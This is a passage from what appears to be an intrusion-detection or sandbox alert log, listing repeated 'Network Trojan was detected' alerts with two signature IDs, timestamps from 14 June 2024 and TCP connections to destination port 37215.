                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150100
                SID:2829579
                Source Port:43702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110699
                SID:2829579
                Source Port:52004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094882
                SID:2829579
                Source Port:60906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965814
                SID:2835222
                Source Port:55522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914803
                SID:2829579
                Source Port:51808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031159
                SID:2835222
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942236
                SID:2829579
                Source Port:42662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226367
                SID:2829579
                Source Port:41896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977482
                SID:2829579
                Source Port:45014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663034
                SID:2835222
                Source Port:42604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.674866
                SID:2829579
                Source Port:46878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880038
                SID:2835222
                Source Port:51924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850331
                SID:2829579
                Source Port:47682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408602
                SID:2829579
                Source Port:50096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849322
                SID:2835222
                Source Port:60796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150806
                SID:2829579
                Source Port:60690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150419
                SID:2835222
                Source Port:59570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504411
                SID:2829579
                Source Port:52218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916170
                SID:2835222
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030002
                SID:2835222
                Source Port:53638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791556
                SID:2829579
                Source Port:47448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735543
                SID:2835222
                Source Port:53316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545670
                SID:2835222
                Source Port:44622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177546
                SID:2829579
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985251
                SID:2835222
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617438
                SID:2829579
                Source Port:41436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762814
                SID:2835222
                Source Port:36168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185200
                SID:2829579
                Source Port:49382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183380
                SID:2829579
                Source Port:57690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082447
                SID:2835222
                Source Port:44398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201970
                SID:2829579
                Source Port:38434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424987
                SID:2835222
                Source Port:53440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679542
                SID:2829579
                Source Port:39500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502710
                SID:2829579
                Source Port:51434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614244
                SID:2829579
                Source Port:56058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420035
                SID:2829579
                Source Port:49142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001543
                SID:2829579
                Source Port:46262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273644
                SID:2835222
                Source Port:48686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791490
                SID:2835222
                Source Port:33152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086865
                SID:2835222
                Source Port:45622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470581
                SID:2835222
                Source Port:35078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014321
                SID:2829579
                Source Port:41200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718560
                SID:2829579
                Source Port:60852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806431
                SID:2835222
                Source Port:54966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294955
                SID:2835222
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451483
                SID:2829579
                Source Port:55370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545237
                SID:2829579
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229845
                SID:2829579
                Source Port:49110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687651
                SID:2835222
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020470
                SID:2835222
                Source Port:39236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.068405
                SID:2829579
                Source Port:57648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225437
                SID:2829579
                Source Port:33432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968004
                SID:2835222
                Source Port:60498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733071
                SID:2835222
                Source Port:58008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763627
                SID:2835222
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292582
                SID:2835222
                Source Port:49010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073094
                SID:2829579
                Source Port:39590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917555
                SID:2829579
                Source Port:37610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617413
                SID:2829579
                Source Port:42536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812329
                SID:2829579
                Source Port:35312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018780
                SID:2829579
                Source Port:35136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449240
                SID:2829579
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615177
                SID:2829579
                Source Port:40556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057594
                SID:2829579
                Source Port:59872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944719
                SID:2835222
                Source Port:55384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133014
                SID:2829579
                Source Port:51752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617257
                SID:2829579
                Source Port:51520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339262
                SID:2829579
                Source Port:48320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877967
                SID:2829579
                Source Port:51034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914560
                SID:2829579
                Source Port:38654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021936
                SID:2835222
                Source Port:59340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079107
                SID:2829579
                Source Port:46828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615099
                SID:2835222
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663419
                SID:2829579
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325360
                SID:2835222
                Source Port:55882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718178
                SID:2835222
                Source Port:55562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227420
                SID:2829579
                Source Port:57742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452117
                SID:2835222
                Source Port:47296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053624
                SID:2835222
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452141
                SID:2829579
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179901
                SID:2835222
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829544
                SID:2835222
                Source Port:45728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228702
                SID:2835222
                Source Port:47054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790404
                SID:2835222
                Source Port:43248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053503
                SID:2829579
                Source Port:52108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812828
                SID:2835222
                Source Port:35938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546675
                SID:2829579
                Source Port:44442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452721
                SID:2829579
                Source Port:50422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790611
                SID:2829579
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.976960
                SID:2829579
                Source Port:39858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227453
                SID:2829579
                Source Port:56864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323458
                SID:2829579
                Source Port:47062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977861
                SID:2835222
                Source Port:59034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896363
                SID:2835222
                Source Port:59188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453460
                SID:2829579
                Source Port:40744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829840
                SID:2829579
                Source Port:49440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671313
                SID:2835222
                Source Port:56508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858180
                SID:2835222
                Source Port:42034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386174
                SID:2835222
                Source Port:49126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368106
                SID:2835222
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777458
                SID:2835222
                Source Port:48998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.090906
                SID:2835222
                Source Port:55660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992008
                SID:2835222
                Source Port:48130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519463
                SID:2835222
                Source Port:60412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326535
                SID:2829579
                Source Port:34402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453389
                SID:2829579
                Source Port:53308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968185
                SID:2829579
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.562973
                SID:2829579
                Source Port:39510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718386
                SID:2829579
                Source Port:60252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977571
                SID:2835222
                Source Port:42882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850083
                SID:2835222
                Source Port:36256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676146
                SID:2829579
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150662
                SID:2829579
                Source Port:48404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011222
                SID:2829579
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364923
                SID:2835222
                Source Port:34550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543848
                SID:2835222
                Source Port:38422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326116
                SID:2835222
                Source Port:38228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411968
                SID:2829579
                Source Port:58794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737715
                SID:2835222
                Source Port:47744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013377
                SID:2835222
                Source Port:56414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791011
                SID:2829579
                Source Port:40428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717143
                SID:2835222
                Source Port:53398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717180
                SID:2835222
                Source Port:45572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073668
                SID:2829579
                Source Port:42166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705483
                SID:2835222
                Source Port:46222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228654
                SID:2829579
                Source Port:52422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849376
                SID:2835222
                Source Port:58228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762621
                SID:2835222
                Source Port:41610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992276
                SID:2835222
                Source Port:42730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944602
                SID:2829579
                Source Port:37594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761229
                SID:2829579
                Source Port:40382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687393
                SID:2829579
                Source Port:53168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092450
                SID:2829579
                Source Port:35102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705287
                SID:2835222
                Source Port:55768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732498
                SID:2829579
                Source Port:54510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967219
                SID:2829579
                Source Port:43102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861346
                SID:2835222
                Source Port:42358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758947
                SID:2829579
                Source Port:56084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419898
                SID:2835222
                Source Port:36610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275695
                SID:2835222
                Source Port:56300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337284
                SID:2835222
                Source Port:41860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677689
                SID:2829579
                Source Port:51468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810699
                SID:2835222
                Source Port:58258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295500
                SID:2829579
                Source Port:50302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150571
                SID:2829579
                Source Port:34396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803338
                SID:2829579
                Source Port:38860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943598
                SID:2829579
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071484
                SID:2835222
                Source Port:53164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422821
                SID:2829579
                Source Port:52778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024652
                SID:2835222
                Source Port:43096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147057
                SID:2835222
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862478
                SID:2835222
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806313
                SID:2829579
                Source Port:50798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151195
                SID:2835222
                Source Port:60232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902160
                SID:2829579
                Source Port:45608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201097
                SID:2829579
                Source Port:37192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229136
                SID:2829579
                Source Port:49860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198587
                SID:2829579
                Source Port:59388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941864
                SID:2829579
                Source Port:45496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944241
                SID:2835222
                Source Port:55340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201421
                SID:2835222
                Source Port:47652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640498
                SID:2835222
                Source Port:49104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944515
                SID:2835222
                Source Port:47864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762282
                SID:2829579
                Source Port:52970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230617
                SID:2829579
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792631
                SID:2829579
                Source Port:45276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452972
                SID:2829579
                Source Port:57340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149906
                SID:2829579
                Source Port:48672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718674
                SID:2835222
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777108
                SID:2835222
                Source Port:55416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366442
                SID:2829579
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984181
                SID:2829579
                Source Port:59320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180116
                SID:2829579
                Source Port:51386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689653
                SID:2835222
                Source Port:34932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288962
                SID:2835222
                Source Port:52726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718526
                SID:2835222
                Source Port:60044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807437
                SID:2829579
                Source Port:59222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668565
                SID:2829579
                Source Port:34026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253820
                SID:2835222
                Source Port:43304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793058
                SID:2829579
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943550
                SID:2835222
                Source Port:34224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689090
                SID:2829579
                Source Port:34234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943569
                SID:2829579
                Source Port:53252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030073
                SID:2829579
                Source Port:53530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072868
                SID:2829579
                Source Port:59528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984831
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160368
                SID:2835222
                Source Port:47226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149583
                SID:2829579
                Source Port:51910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565309
                SID:2829579
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176938
                SID:2829579
                Source Port:46082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845894
                SID:2835222
                Source Port:54050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368891
                SID:2835222
                Source Port:48322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185384
                SID:2835222
                Source Port:50616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342132
                SID:2835222
                Source Port:57408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979891
                SID:2835222
                Source Port:44626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669537
                SID:2829579
                Source Port:45350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735080
                SID:2835222
                Source Port:36296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
